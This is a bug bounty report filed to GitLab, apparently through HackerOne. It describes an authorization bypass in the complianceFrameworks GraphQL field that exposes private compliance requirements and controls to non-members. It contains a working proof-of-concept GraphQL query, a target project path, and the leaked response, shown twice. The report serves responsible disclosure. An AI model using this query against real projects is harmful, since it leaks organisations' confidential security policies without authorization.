Bypassed CVE-2025-5195 - complianceRequirements data disclosed from complianceFrameworks query despite "security and compliance" is hidden
HackerOne report #3307422 by weasterhacker on 2025-08-20, assigned to @gandrews7:
Report
Hi team,
Gitlab fixed a issue - #534960 (closed)
where an attacker can disclose all information of compilance center -even victim set all project feature private -repository and compliance center all set to be private
here some sensitve informnation exposing like requirement severe information,polices, and controls information and full complicance center information -
compliance framework descriptions to contain some information that might need to remain confidential (to the scope of the organisation at least).
Gitlab fixed this issue in 18.02 patch release - https://about.gitlab.com/releases/2025/06/11/patch-release-gitlab-18-0-2-released/
When at Public project owner made All project features private - repository,issue,merge request, security & compliance feature restricted to only project members (private)
then attacker (non-project member) of victim project access victim project -https://gitlab.com/jordenme1112-group/jordenme1112-project
it said - "Only group owners and maintainers can view the framework details"-like frameworks dicription,requirements information,policies,controls information about set api and other severe information .
wheNow As Attacker non member of victim project (where all feature restricted to only project members)
Execute this GraphQL Query -
query getTotalVulnerabilities($projectPath: ID!) {
project(fullPath: $projectPath) {
id
complianceFrameworks {
edges {
node {
id
name
color
complianceRequirements {
edges {
node {
id
name
complianceRequirementsControls {
edges {
node {
id
name
externalUrl
externalControlName
}
}
}
__typename
}
}
}
projects {
edges {
node {
id
}
}
}
default
description
editPath
updatedAt
complianceRequirements {
edges {
node {
id
name
description
}
}
}
__typename
}
}
}
archived
}
}
Varibles
{
"projectPath": "chotelalgroup/chotebabuproject"
}
Response -
{
"data": {
"project": {
"id": "gid://gitlab/Project/71780971",
"complianceFrameworks": {
"edges": [
{
"node": {
"id": "gid://gitlab/ComplianceManagement::Framework/2023155",
"name": "victim framework",
"color": "#cd5b45",
"complianceRequirements": {
"edges": [
{
"node": {
"id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirement/1004779",
"name": "ewewew",
"complianceRequirementsControls": {
"edges": [
{
"node": {
"id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirementsControl/12816",
"name": "scanner_api_security_running",
"externalUrl": "",
"externalControlName": ""
}
}
]
},
"__typename": "ComplianceRequirement",
"description": "eewewew"
}
},
{
"node": {
"id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirement/1004778",
"name": "errere",
"complianceRequirementsControls": {
"edges": []
},
"__typename": "ComplianceRequirement",
"description": "errerererere"
}
}
]
},
"projects": {
"edges": [
{
"node": {
"id": "gid://gitlab/Project/71780971"
}
}
]
},
"default": true,
"description": "dffdfdfdfd",
"editPath": "/groups/chotelalgroup/-/security/compliance_dashboard/frameworks/2023155",
"updatedAt": "2025-08-20T21:57:55Z",
"__typename": "ComplianceFramework"
}
}
]
},
"archived": false
}
},
"correlationId": "a707aa7e7871dc5383b417dc891dd73f"
}
Steps to Reproduce
As Attacker -
Identify a project in GitLab with all features set private only accessible by project members.
https://gitlab.com/chotelalgroup/chotebabuproject
As a non-member (unauthenticated/outsider), execute the above GraphQL query:
The API discloses sensitive compliance data, e.g.:
{
"data": {
"project": {
"id": "gid://gitlab/Project/71780971",
"complianceFrameworks": {
"edges": [
{
"node": {
"id": "gid://gitlab/ComplianceManagement::Framework/2023155",
"name": "victim framework",
"color": "#cd5b45",
"complianceRequirements": {
"edges": [
{
"node": {
"id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirement/1004779",
"name": "ewewew",
"complianceRequirementsControls": {
"edges": [
{
"node": {
"id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirementsControl/12816",
"name": "scanner_api_security_running",
"externalUrl": "",
"externalControlName": ""
}
}
]
},
"__typename": "ComplianceRequirement",
"description": "eewewew"
}
},
{
"node": {
"id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirement/1004778",
"name": "errere",
"complianceRequirementsControls": {
"edges": []
},
"__typename": "ComplianceRequirement",
"description": "errerererere"
}
}
]
},
"projects": {
"edges": [
{
"node": {
"id": "gid://gitlab/Project/71780971"
}
}
]
},
"default": true,
"description": "dffdfdfdfd",
"editPath": "/groups/chotelalgroup/-/security/compliance_dashboard/frameworks/2023155",
"updatedAt": "2025-08-20T21:57:55Z",
"__typename": "ComplianceFramework"
}
}
]
},
"archived": false
}
},
"correlationId": "a707aa7e7871dc5383b417dc891dd73f"
}
Confidentiality Breach -
Compliance frameworks often contain internal security policies, regulatory requirements, and control mappings that are meant for restricted organizational use.
References
GitLab Security Patch Release: 18.0.2
GitLab Issue Tracker: #534960 (closed)
CVE: [CVE-2025-5195]
Impact
An attacker could disclose sensitive Compliance Center data (framework descriptions, requirements, policies, and controls) from GitLab projectswithout authorization. This leaks confidential organizational security/compliance policies, which can be used for targeted attacks, regulatory intelligence gathering, and social engineering, even when all project features are restricted to members only.
How To Reproduce
Please add reproducibility information to this section: